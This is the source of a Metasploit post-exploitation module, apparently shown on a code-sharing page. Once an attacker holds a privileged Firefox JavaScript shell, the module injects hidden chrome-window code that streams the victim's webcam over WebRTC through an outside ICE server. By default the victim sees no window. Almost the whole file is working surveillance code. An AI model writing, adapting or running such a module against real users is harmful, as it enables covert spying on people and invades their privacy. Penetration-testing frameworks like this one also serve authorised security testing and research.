Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
10
  include Msf::Post::WebRTC
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell',
17
        'Description' => %q{
18
          This module allows streaming a webcam from a privileged Firefox Javascript shell.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'joev' ],
22
        'References' => [
23
          [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
24
        ],
25
        'DisclosureDate' => '2014-05-13'
26
      )
27
    )
28

29
    register_options([
30
      OptBool.new('CLOSE', [false, 'Forcibly close previous chat session', false]),
31
      OptBool.new('VISIBLE', [false, 'Show a window containing the chat to the target', false]),
32
      OptInt.new('TIMEOUT', [false, 'End the chat session after this many seconds', -1]),
33
      OptString.new('ICESERVER', [true, 'The ICE server that sets up the P2P connection', 'wsnodejs.jit.su:80'])
34
    ])
35
  end
36

37
  def run
38
    unless os_check
39
      print_error 'Windows versions of Firefox are not supported at this time [RM #8810].'
40
      return
41
    end
42

43
    server = datastore['ICESERVER']
44
    offerer_id = Rex::Text.rand_text_alphanumeric(10)
45
    channel = Rex::Text.rand_text_alphanumeric(20)
46

47
    result = js_exec(js_payload(server, offerer_id, channel))
48

49
    if datastore['CLOSE']
50
      print_status 'Stream closed.'
51
    elsif result.present?
52
      print_status result
53
      connect_video_chat(server, channel, offerer_id)
54
    else
55
      print_warning 'No response received'
56
    end
57
  end
58

59
  def os_check
60
    user_agent = js_exec(%|
61
      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
62
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
63
    |)
64
    user_agent !~ /windows/i
65
  end
66

67
  def js_payload(server, offerer_id, channel)
68
    interface = load_interface('offerer.html')
69
    api = load_api_code
70

71
    interface.gsub!(/=SERVER=/, server)
72
    interface.gsub!(/=CHANNEL=/, channel)
73
    interface.gsub!(/=OFFERERID=/, offerer_id)
74

75
    if datastore['TIMEOUT'] > 0
76
      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000}); "
77
    end
78

79
    url = if datastore['CLOSE']
80
            '"about:blank"'
81
          else
82
            '"data:text/html;base64,"+html'
83
          end
84

85
    name = if datastore['VISIBLE']
86
             Rex::Text.rand_text_alphanumeric(10)
87
           else
88
             '_self'
89
           end
90

91
    %|
92
      (function(send){
93
        try {
94

95
          var AppShellService = Components
96
             .classes["@mozilla.org/appshell/appShellService;1"]
97
             .getService(Components.interfaces.nsIAppShellService);
98

99
          var html = "#{Rex::Text.encode_base64(interface)}";
100
          var url = #{url};
101
          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
102
          send("Streaming webcam...");
103

104
        } catch (e) {
105
          send(e);
106
        }
107
      })(this.send);
108
    |
109
  end
110
end
111

112